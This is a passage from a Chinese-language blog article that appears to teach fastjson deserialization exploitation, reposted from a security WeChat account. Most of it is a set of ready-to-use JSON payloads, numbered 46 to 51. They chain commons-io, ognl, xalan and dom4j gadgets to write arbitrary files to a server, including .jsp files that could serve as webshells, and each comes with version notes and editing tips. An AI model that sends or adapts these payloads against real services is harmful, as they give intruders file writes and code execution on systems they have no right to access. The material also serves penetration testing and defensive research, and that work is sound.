{ "x":{ "@type":"java.lang.AutoCloseable", "@type":"sun.rmi.server.MarshalOutputStream", "out":{ "@type":"java.util.zip.InflaterOutputStream", "out":{ "@type":"java.io.FileOutputStream", "file":"C:/Users/whoami/Desktop/testtesttest.txt", "append":false }, "infl":{ "input":"SGVsbG8sIFcwMWZoNGNrZXIh" }, "bufLen":1048576 }, "protocolVersion":1 }}Windows下利用会报错,只能在目标是centos的情况下使用:
至于为什么会这样,请参考以下文章,写的很清楚很明白,在此不再赘述:
5.1.2 commons-io 2.0~2.6版本
payload46:
需要注意,需要修改下面的W01fh4ckeraaaaaa...为自己想要写入的内容,需要注意的是,长度要大于8192,实际写入前8192个字符!具体原因请参考下面的文章,文章里面写的非常清楚:
{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""W01fh4ckeraaaaaa..."},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"W01fh4cker.txt","encoding":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}5.1.3 commons-io 2.7~2.8.0版本和上面大差不差,同样需要自行修改写入内容。
payload47:
{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""W01fh4ckeraaaaaa...","start":0,"end":2147483647},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"2.txt","charsetName":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}5.2 ognl+commons-io 2.x(1.2.73<=version<=1.2.80)5.2.1 ognl+commons-io 2.0~2.6版本payload48:
同样是省略了一堆a,需要自行修改补充。
{"su14":{"@type":"java.lang.Exception","@type":"ognl.OgnlException"},"su15":{"@type":"java.lang.Class","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"ognl.OgnlException","_evaluation":""}},"su16":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""W01fh4ckeraaaaaa..."},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"W01fh4cker.jsp","encoding":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},"su17":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.node.p.stream.delegate.reader.is.input"},"branch":{"$ref":"$.su16.node.p.stream.delegate.reader.is.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},"su18":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.node.p.stream.delegate.reader.is.input"},"branch":{"$ref":"$.su16.node.p.stream.delegate.reader.is.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},"su19":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.node.p.stream.delegate.reader.is.input"},"branch":{"$ref":"$.su16.node.p.stream.delegate.reader.is.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},}5.2.2 ognl+commons-io 2.7~2.8版本payload49:
{"su14":{"@type":"java.lang.Exception","@type":"ognl.OgnlException"},"su15":{"@type":"java.lang.Class","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"ognl.OgnlException","_evaluation":""}},"su16":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""W01fh4ckeraaaaaa...","start":0,"end":2147483647},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"W01fh4cker666.jsp","charsetName":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},"su17":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.node.p.stream.delegate.reader.inputStream.input"},"branch":{"$ref":"$.su16.node.p.stream.delegate.reader.inputStream.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},"su18":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.node.p.stream.delegate.reader.inputStream.input"},"branch":{"$ref":"$.su16.node.p.stream.delegate.reader.inputStream.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}},"su19":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.node.p.stream.delegate.reader.inputStream.input"},"branch":{"$ref":"$.su16.node.p.stream.delegate.reader.inputStream.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}}}}5.2.3 ognl+commons-io+aspectjtools+commons-codec组合利用链这条链主要是为了解决前面提到的的io链无法写入复杂文件结构的问题,文件依旧需要大于8kb才能写入。poc地址如下:
5.3 xalan+dom4j+commons-io(1.2.73<=version<=1.2.80)5.3.1 xalan+dom4j+commons-io(2.0~2.6版本)
分四步打,自行修改写入内容。
payload50(组合拳):
{"@type":"java.lang.Exception","@type":"org.apache.xml.dtm.DTMConfigurationException","locator":{}}{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.apache.xml.dtm.DTMConfigurationException","locator":{}}}}{"su14":{"@type":"javax.xml.transform.SourceLocator","@type":"org.apache.xpath.objects.XNodeSetForDOM","nodeIter":{"@type":"org.apache.xpath.NodeSet"},"xctxt":{"@type":"org.apache.xpath.XPathContext","primaryReader":{"@type":"org.dom4j.io.XMLWriter","entityResolver":{"@type":"org.dom4j.io.SAXContentHandler","inputSource":{"byteStream":{"@type":"java.io.InputStream"}}}}}}}{"su16":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""W01fh4ckeraaaaaa..."},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"W01fh4cker888.jsp","encoding":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]},"su17":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.delegate.reader.is.input"},"branch":{"$ref":"$.su16.delegate.reader.is.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]},"su18":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.delegate.reader.is.input"},"branch":{"$ref":"$.su16.delegate.reader.is.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]},"su19":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.delegate.reader.is.input"},"branch":{"$ref":"$.su16.delegate.reader.is.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}5.3.2 xalan+dom4j+commons-io(2.7~2.8版本)还是分四步打。
payload51(组合拳):
{"@type":"java.lang.Exception","@type":"org.apache.xml.dtm.DTMConfigurationException","locator":{}}{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.apache.xml.dtm.DTMConfigurationException","locator":{}}}}{"su14":{"@type":"javax.xml.transform.SourceLocator","@type":"org.apache.xpath.objects.XNodeSetForDOM","nodeIter":{"@type":"org.apache.xpath.NodeSet"},"xctxt":{"@type":"org.apache.xpath.XPathContext","primaryReader":{"@type":"org.dom4j.io.XMLWriter","entityResolver":{"@type":"org.dom4j.io.SAXContentHandler","inputSource":{"byteStream":{"@type":"java.io.InputStream"}}}}}}}{"su16":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""W01fh4ckeraaaaaa...","start":0,"end":2147483647},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"W01fh4cker999.jsp","charsetName":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]},"su17":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.delegate.reader.inputStream.input"},"branch":{"$ref":"$.su16.delegate.reader.inputStream.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]},"su18":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.delegate.reader.inputStream.input"},"branch":{"$ref":"$.su16.delegate.reader.inputStream.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]},"su19":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.su16.delegate.reader.inputStream.input"},"branch":{"$ref":"$.su16.delegate.reader.inputStream.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36,82]}]}}5.3.3 xalan+dom4j+commons-io+aspectjtools+commons-codec组合利用链这条链主要是为了解决前面提到的的io链无法写入复杂文件结构的问题,文件依旧需要大于8kb才能写入。poc地址如下:
5.4 覆盖charsets.jar导致RCE
这里不做复现,可参考:
任意文件写场景下的SpringBoot RCE/
其中第四篇是对其做了完整详细的复现。
六、总结与致谢
由于接下来一段时间会很忙,因此还是决定把fastjson利用提高篇分两部分来写,第一部分也就是本文主要介绍各个json库之间的判断方法、fastjson版本判断方法、服务器环境的探测方法、文件读取的方法以及文件写入的方法。
在第二篇文章中,我们将讨论fastjson各版本的rce的payload、fastjson内网不出网情况下的利用、fastjson内存马注入。
由于经常熬夜,写文章的时候难免头脑发昏出现错误,欢迎在公众号后台或者我的朋友圈留言指出,我将在下一篇文章的开头对提出来的师傅进行感谢。
感谢以下师傅写的文章,本文或参考或引用,在他们的基础上进行了总结和修改:
×tamp=1697804173&ver=4846&signature=hOU1Dr6toY8j7eZ0B9ztaRNcZRvWXgr8SW4ER3pbsNrHVxEkxKqLB38qX3BOfN8XgTKqHR9wH70P9nKtKEw5-XzOXS3YoxcDFhn4fi-Gw*x6gswLM2I2zq2i7BZ-PwI1&new=1
本文来源于追梦信安-W01fh4cker
版权声明:
本站文章均来自互联网搜集,如有侵犯您的权益,请联系我们删除,谢谢。
标签: #apache2301
